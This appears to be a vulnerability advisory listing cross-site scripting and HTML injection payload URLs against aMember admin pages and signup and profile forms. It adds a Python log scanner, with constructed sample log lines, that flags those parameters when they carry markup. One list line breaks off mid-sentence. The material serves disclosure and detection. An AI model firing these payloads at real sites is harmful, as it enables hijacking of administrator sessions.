http://www.example.com/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.example.com/amember/admin/users.php?status="><script>alert(0)</script>
http://www.example.com/amember/admin/users.php?action=<script>alert(0)</script>
http://www.example.com/amember/admin/setup.php?notebook=<script>alert(0)</script>
http://www.example.com/amember/admin/newsletter_threads.php?action=edit&thread_id="><script>alert(0)</script>
http://www.example.com/amember/admin/newsletter_guests.php?action=edit&guest_id="><script>alert(0)</script>
http://www.example.com/amember/admin/products.php?action=<script>alert(0)</script>
http://www.example.com/amember/admin/protect.php?action=<script>alert(0)</script>
http://www.example.com/amember/admin/coupons.php?action=<script>alert(0)</script>
http://www.example.com/amember/admin/aff_banners.php?action=edit_banner&banner_id="><script>alert(0)</script>
http://www.example.com/amember/admin/aff_banners.php?action=edit_link&banner_id="><script>alert(0)</script>
http://www.example.com/amember/admin/email_templates.php?a=edit&tpl=<script>alert(0)</script>
http://www.example.com/amember/aff.php?action=<script>alert(0)</script> (this might only affect

HTML Injection: (insert: "><script>alert(0)</script> into the mentioned forms)
http://www.example.com/amember/signup.php (first- and last-name)
http://www.example.com/amember/aff_signup.php (first- and last-name)
http://www.example.com/amember/profile.php (first- and last-name)
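
For defenders reviewing web server logs, the following added example (not part of the original advisory and not aMember code) flags requests where one of the parameters listed above carries markup characters after URL-decoding. It assumes the application is installed under /amember as in the URLs above and that logs use the combined log format; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint -> parameters, taken from the URLs listed above (install path assumed).
WATCHED = {
    "/amember/admin/users.php": {"letter", "status", "action"},
    "/amember/admin/setup.php": {"notebook"},
    "/amember/admin/newsletter_threads.php": {"thread_id"},
    "/amember/admin/newsletter_guests.php": {"guest_id"},
    "/amember/admin/products.php": {"action"},
    "/amember/admin/protect.php": {"action"},
    "/amember/admin/coupons.php": {"action"},
    "/amember/admin/aff_banners.php": {"banner_id"},
    "/amember/admin/email_templates.php": {"tpl"},
    "/amember/aff.php": {"action"},
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>"]')

def suspicious_params(target):
    """Return sorted (param, decoded value) pairs that carry markup characters."""
    url = urlsplit(target)
    hits = []
    for name, values in parse_qs(url.query).items():
        if name not in WATCHED.get(url.path, ()):
            continue
        for value in values:
            decoded = unquote(value)  # second pass catches double-encoded values
            if MARKUP.search(decoded):
                hits.append((name, decoded))
    return sorted(hits)

def scan(lines):
    """Yield (line number, path, hits) for each flagged access-log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, urlsplit(match.group(1)).path, hits

# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /amember/admin/users.php?letter=A HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /amember/admin/users.php?status=%22%3E%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 5300',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /amember/admin/aff_banners.php?action=edit_banner&banner_id=%2522%253E%253Cb%253E HTTP/1.1" 200 4100',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /amember/member.php?q=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The first- and last-name form fields listed under HTML Injection are not covered here, on the assumption that they are submitted in the request body, which access logs do not normally record.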